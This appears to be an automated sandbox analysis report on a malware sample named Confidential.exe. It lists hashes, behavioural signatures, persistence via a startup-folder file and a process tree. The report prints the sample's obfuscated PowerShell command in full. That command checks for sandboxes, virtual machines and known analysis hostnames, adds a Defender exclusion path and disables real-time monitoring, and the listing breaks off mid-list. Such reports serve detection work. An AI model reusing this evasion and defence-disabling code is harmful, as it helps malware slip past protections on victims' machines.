Analysis
max time kernel: 141s
max time network: 146s
platform: windows10-2004_x64
resource: win10v2004-20230621-en
resource tags: arch:x64, arch:x86, image:win10v2004-20230621-en, locale:en-us, os:windows10-2004-x64, system
submitted: 01-07-2023 05:48
Behavioral task: behavioral1
Sample: Confidential.exe
Resource: win7-20230621-en
General
Target: Confidential.exe
Size: 6.3MB
MD5: fccbea6f574c7e047b761e3532707dc1
SHA1: ed32c1494e8b4394616e846eb2f5dacb02cb5b40
SHA256: 9abe0ca0b62f85b93c77599e28ad4383972b9b2731735c0d35a1d57c1edf50cc
SHA512: c4c55a1603f0f903d7f20b555c9c27c342a0c174ec0a17425e8bc920a0838a082d3918f280dc378c4b6d9e0d6d60a510bd51061592523cfda5a82653e77d5bfe
SSDEEP: 196608:yLBtOdQmRJ8dA6lXCy1ArqkVpKCX+PrF4ZIegh0EVZ:+BodQuslXrAZYCuPJOIeg2u
Malware Config
Signatures
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | powershell.exe
Blocklisted process makes network request 5 IoCs
flow | pid | Process
33 | 2964 | powershell.exe
80 | 2964 | powershell.exe
81 | 2964 | powershell.exe
82 | 2964 | powershell.exe
84 | 2964 | powershell.exe
Drops startup file 2 IoCs
description | ioc | Process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe | powershell.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe | powershell.exe
Loads dropped DLL 7 IoCs
pid | Process
1236 | Confidential.exe
1236 | Confidential.exe
1236 | Confidential.exe
1236 | Confidential.exe
1236 | Confidential.exe
1236 | Confidential.exe
1236 | Confidential.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid | Process
1236 | Confidential.exe
Drops file in Program Files directory 2 IoCs
description | ioc | Process
File created | C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\2e493086-8d69-4707-ae84-6bfde2705647.tmp | setup.exe
File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20230701054904.pma | setup.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Enumerates system info in registry 2 TTPs 3 IoCs
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
Modifies registry class 1 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | msedge.exe
Suspicious behavior: EnumeratesProcesses 14 IoCs
pid | Process
4548 | powershell.exe
4548 | powershell.exe
2964 | powershell.exe
2964 | powershell.exe
3288 | msedge.exe
3288 | msedge.exe
3232 | msedge.exe
3232 | msedge.exe
5432 | identity_helper.exe
5432 | identity_helper.exe
5576 | msedge.exe
5576 | msedge.exe
5576 | msedge.exe
5576 | msedge.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid | Process
3232 | msedge.exe
3232 | msedge.exe
3232 | msedge.exe
3232 | msedge.exe
3232 | msedge.exe
3232 | msedge.exe
3232 | msedge.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
pid | Process | Token values, in the order recorded
4548 | powershell.exe | SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36 (22 entries)
2964 | powershell.exe | SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35 (42 entries)
Suspicious use of FindShellTrayWindow 3 IoCs
pid | Process
3232 | msedge.exe
3232 | msedge.exe
3232 | msedge.exe
Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target
PID 372 wrote to memory of 1236 | 372 | Confidential.exe | 82 (2 entries)
PID 1236 wrote to memory of 3772 | 1236 | Confidential.exe | 84 (2 entries)
PID 1236 wrote to memory of 4548 | 1236 | Confidential.exe | 86 (2 entries)
PID 1236 wrote to memory of 4436 | 1236 | Confidential.exe | 90 (2 entries)
PID 1236 wrote to memory of 2964 | 1236 | Confidential.exe | 91 (2 entries)
PID 4436 wrote to memory of 3232 | 4436 | cmd.exe | 94 (2 entries)
PID 3232 wrote to memory of 8 | 3232 | msedge.exe | 97 (2 entries)
PID 2964 wrote to memory of 4680 | 2964 | powershell.exe | 98 (2 entries)
PID 3232 wrote to memory of 2564 | 3232 | msedge.exe | 99 (40 entries)
PID 3232 wrote to memory of 3288 | 3232 | msedge.exe | 100 (2 entries)
PID 3232 wrote to memory of 2068 | 3232 | msedge.exe | 101 (6 entries)
Processes
[1] C:\Users\Admin\AppData\Local\Temp\Confidential.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\Confidential.exe"
    PID: 372
    - Suspicious use of WriteProcessMemory
  [2] C:\Users\Admin\AppData\Local\Temp\Confidential.exe
      command line: "C:\Users\Admin\AppData\Local\Temp\Confidential.exe"
      PID: 1236
      - Loads dropped DLL
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\cmd.exe
        command line: C:\Windows\system32\cmd.exe /c "ver"
        PID: 3772
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: powershell "$IsVirtual=Get-CimInstance win32_computersystem | select -ExpandProperty Model;$IsVirtual"
        PID: 4548
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\cmd.exe
        command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI3722\Confidential.pdf"
        PID: 4436
        - Suspicious use of WriteProcessMemory
      [4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\_MEI3722\Confidential.pdf
          PID: 3232
          - Enumerates system info in registry
          - Modifies registry class
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
          - Suspicious use of FindShellTrayWindow
          - Suspicious use of WriteProcessMemory
        [5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffebd1246f8,0x7ffebd124708,0x7ffebd124718
            PID: 8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,3867089064321648031,13038395085078569982,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:25⤵PID:2564
        [5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,3867089064321648031,13038395085078569982,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2360 /prefetch:3
            PID: 3288
            - Suspicious behavior: EnumeratesProcesses
        [5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,3867089064321648031,13038395085078569982,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2712 /prefetch:8
            PID: 2068
        [5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3867089064321648031,13038395085078569982,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3568 /prefetch:1
            PID: 1796
        [5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3867089064321648031,13038395085078569982,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3556 /prefetch:1
            PID: 1740
        [5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3867089064321648031,13038395085078569982,131072 --disable-gpu-compositing --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2944 /prefetch:1
            PID: 2420
        [5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --field-trial-handle=2120,3867089064321648031,13038395085078569982,131072 --lang=en-US --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=5236 /prefetch:6
            PID: 2680
        [5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3867089064321648031,13038395085078569982,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5444 /prefetch:1
            PID: 1872
        [5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3867089064321648031,13038395085078569982,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5432 /prefetch:1
            PID: 3944
        [5] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
            command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,3867089064321648031,13038395085078569982,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5768 /prefetch:8
            PID: 3044
        [5] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
            command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
            PID: 4676
            - Drops file in Program Files directory
          [6] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
              command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff771885460,0x7ff771885470,0x7ff771885480
              PID: 2864
        [5] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
            command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,3867089064321648031,13038395085078569982,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5768 /prefetch:8
            PID: 5432
            - Suspicious behavior: EnumeratesProcesses
        [5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3867089064321648031,13038395085078569982,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6196 /prefetch:1
            PID: 5440
        [5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3867089064321648031,13038395085078569982,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6224 /prefetch:1
            PID: 5448
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,3867089064321648031,13038395085078569982,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1812 /prefetch:25⤵
            PID: 5576
            - Suspicious behavior: EnumeratesProcesses
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass "$startdate=(Get-Date 2022-11-09).toString(\"yyyy-MM-dd\") $enddate=(Get-Date 2023-07-10).toString(\"yyyy-MM-dd\") $today=Get-Date -format yyyy-MM-dd function IsInWindowsSandbox { $inSandbox = $false $env:SandboxProfilePath = $null $env:SandboxUid = $null if ($env:WSB_IsHostEnvironment -eq \"1\" -and $env:WSB_Sandboxed -eq \"1\") { $inSandbox = $true $env:SandboxProfilePath = $env:WSB_ProfilePath $env:SandboxUid = $env:WSB_Uid } return $inSandbox } curl ChwmDW.coms if (IsInWindowsSandbox) { exit } else { if($today -ge $startdate -and $today -le $enddate){ $ProgressPreference = \"S\"+\"i\"+\"l\"+\"e\"+\"n\"+\"t\"+\"l\"+\"y\"+\"C\"+\"o\"+\"n\"+\"t\"+\"i\"+\"n\"+\"u\"+\"e\" $ErrorActionPreference = \"S\"+\"i\"+\"l\"+\"e\"+\"n\"+\"t\"+\"l\"+\"y\"+\"C\"+\"o\"+\"n\"+\"t\"+\"i\"+\"n\"+\"u\"+\"e\" $new_line= \"A\"+\"d\"+\"d\"+\"-\"+\"M\"+\"p\"+\"P\"+\"r\"+\"e\"+\"f\"+\"e\"+\"r\"+\"e\"+\"n\"+\"c\"+\"e\"+\" -E\"+\"x\"+\"c\"+\"l\"+\"u\"+\"s\"+\"i\"+\"o\"+\"n\"+\"P\"+\"a\"+\"t\"+\"h\";$last_line=\"$pwd\".SubString(0,3);Invoke-Expression \"$new_line $last_line -Force\";Set-MpPreference -DisableRealtimeMonitoring $true $IsVirtual=Get-CimInstance win32_computersystem | select -ExpandProperty Model if ($IsVirtual -eq 'V'+'i'+'r'+'t'+'u'+'a'+'l'+'B'+'o'+'x'){ exit }elseif($IsVirtual -eq 'V'+'M'+'W'+'a'+'r'+'e') { exit }elseif($IsVirtual -eq 'H'+'y'+'p'+'e'+'r'+'-'+'V') { exit }elseif($IsVirtual -eq 'P'+'a'+'r'+'a'+'l'+'l'+'e'+'l'+'s') { exit }elseif($IsVirtual -eq 'O'+'r'+'a'+'c'+'l'+'e'+' '+'V'+'M'+' '+'V'+'i'+'r'+'t'+'u'+'a'+'l'+'B'+'o'+'x') { exit }elseif($IsVirtual -eq 'C'+'i'+'t'+'r'+'i'+'x'+' '+'H'+'y'+'p'+'e'+'r'+'v'+'i'+'s'+'o'+'r') { exit }elseif($IsVirtual -eq 'Q'+'E'+'M'+'U') { exit }elseif($IsVirtual -eq 'K'+'V'+'M') { exit }elseif($IsVirtual -eq 'P'+'r'+'o'+'x'+'m'+'o'+'x'+' '+'V'+'E') { exit }elseif($IsVirtual -eq 'D'+'o'+'c'+'k'+'e'+'r') { exit }else { $HNAME2023=hostname if 
($HNAME2023 -eq '0'+'0'+'9'+'0'+'0'+'B'+'C'+'8'+'3'+'8'+'0'+'3') { exit } if ($HNAME2023 -eq '0'+'C'+'C'+'4'+'7'+'A'+'C'+'8'+'3'+'8'+'0'+'3') { exit } if ($HNAME2023 -eq '6'+'C'+'4'+'E'+'7'+'3'+'3'+'F'+'-'+'C'+'2'+'D'+'9'+'-'+'4') { exit } if ($HNAME2023 -eq 'A'+'C'+'E'+'P'+'C') { exit } if ($HNAME2023 -eq 'A'+'I'+'D'+'A'+'N'+'P'+'C') { exit } if ($HNAME2023 -eq 'A'+'L'+'E'+'N'+'M'+'O'+'O'+'S'+'-'+'P'+'C') { exit } if ($HNAME2023 -eq 'A'+'L'+'I'+'O'+'N'+'E') { exit } if ($HNAME2023 -eq 'A'+'P'+'P'+'O'+'N'+'F'+'L'+'Y'+'-'+'V'+'P'+'S') { exit } if ($HNAME2023 -eq 'A'+'R'+'C'+'H'+'I'+'B'+'A'+'L'+'D'+'P'+'C') { exit } if ($HNAME2023 -eq 'a'+'z'+'u'+'r'+'e') { exit } if ($HNAME2023 -eq 'B'+'3'+'0'+'F'+'0'+'2'+'4'+'2'+'-'+'1'+'C'+'6'+'A'+'-'+'4') { exit } if ($HNAME2023 -eq 'B'+'A'+'R'+'O'+'S'+'I'+'N'+'O'+'-'+'P'+'C') { exit } if ($HNAME2023 -eq 'B'+'E'+'C'+'K'+'E'+'R'+'-'+'P'+'C') { exit } if ($HNAME2023 -eq 'B'+'E'+'E'+'7'+'3'+'7'+'0'+'C'+'-'+'8'+'C'+'0'+'C'+'-'+'4') { exit } if ($HNAME2023 -eq 'C'+'O'+'F'+'F'+'E'+'E'+'-'+'S'+'H'+'O'+'P') { exit } if ($HNAME2023 -eq 'C'+'O'+'M'+'P'+'N'+'A'+'M'+'E'+'_'+'4'+'0'+'4'+'7') { exit } if ($HNAME2023 -eq 'd'+'1'+'b'+'n'+'J'+'k'+'f'+'V'+'l'+'H') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'1'+'9'+'O'+'L'+'L'+'T'+'D') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'1'+'P'+'Y'+'K'+'P'+'2'+'9') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'1'+'Y'+'2'+'4'+'3'+'3'+'R') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'4'+'U'+'8'+'D'+'T'+'F'+'8') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'5'+'4'+'X'+'G'+'X'+'6'+'F') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'5'+'O'+'V'+'9'+'S'+'0'+'O') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'6'+'A'+'K'+'Q'+'Q'+'A'+'M') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'6'+'B'+'M'+'F'+'T'+'6'+'5') { exit } if ($HNAME2023 -eq 
'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'7'+'0'+'T'+'5'+'S'+'D'+'X') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'7'+'A'+'F'+'S'+'T'+'D'+'P') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'7'+'X'+'C'+'6'+'G'+'E'+'Z') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'8'+'K'+'9'+'D'+'9'+'3'+'B') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'A'+'H'+'G'+'X'+'K'+'T'+'V') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'A'+'L'+'B'+'E'+'R'+'T'+'O') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'B'+'0'+'T'+'9'+'3'+'D'+'6') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'B'+'G'+'N'+'5'+'L'+'8'+'Y') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'B'+'U'+'G'+'I'+'O') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'B'+'X'+'J'+'Y'+'A'+'E'+'C') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'C'+'B'+'G'+'P'+'F'+'E'+'E') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'C'+'D'+'Q'+'E'+'7'+'V'+'N') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'C'+'H'+'A'+'Y'+'A'+'N'+'N') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'C'+'M'+'0'+'D'+'A'+'W'+'8') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'C'+'N'+'F'+'V'+'L'+'M'+'W') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'C'+'R'+'C'+'C'+'C'+'O'+'T') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'D'+'0'+'1'+'9'+'G'+'D'+'M') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'D'+'4'+'F'+'E'+'N'+'3'+'M') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'D'+'E'+'3'+'6'+'9'+'S'+'E') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'D'+'I'+'L'+'6'+'I'+'Y'+'A') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'E'+'C'+'W'+'Z'+'X'+'Y'+'2') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'F'+'7'+'B'+'G'+'E'+'N'+'9') { exit } if ($HNAME2023 -eq 
'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'F'+'S'+'H'+'H'+'Z'+'L'+'J') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'G'+'4'+'C'+'W'+'F'+'L'+'F') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'G'+'E'+'L'+'A'+'T'+'O'+'R') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'G'+'L'+'B'+'A'+'Z'+'X'+'T') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'G'+'N'+'Q'+'Z'+'M'+'0'+'O') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'G'+'P'+'P'+'K'+'5'+'V'+'Q') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'H'+'A'+'S'+'A'+'N'+'L'+'O') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'H'+'Q'+'L'+'U'+'W'+'F'+'A') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'H'+'S'+'S'+'0'+'D'+'J'+'9') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'I'+'A'+'P'+'K'+'N'+'1'+'P') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'I'+'F'+'C'+'A'+'Q'+'V'+'L') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'I'+'O'+'N'+'5'+'Z'+'S'+'B') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'J'+'Q'+'P'+'I'+'F'+'W'+'D') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'K'+'A'+'L'+'V'+'I'+'N'+'O') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'K'+'O'+'K'+'O'+'V'+'S'+'K') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'N'+'A'+'K'+'F'+'F'+'M'+'T') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'N'+'K'+'P'+'0'+'I'+'4'+'P') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'N'+'M'+'1'+'Z'+'P'+'L'+'G') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'N'+'T'+'U'+'7'+'V'+'U'+'O') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'Q'+'U'+'A'+'Y'+'8'+'G'+'S') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'R'+'C'+'A'+'3'+'Q'+'W'+'X') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'R'+'H'+'X'+'D'+'K'+'W'+'W') { exit } if ($HNAME2023 -eq 
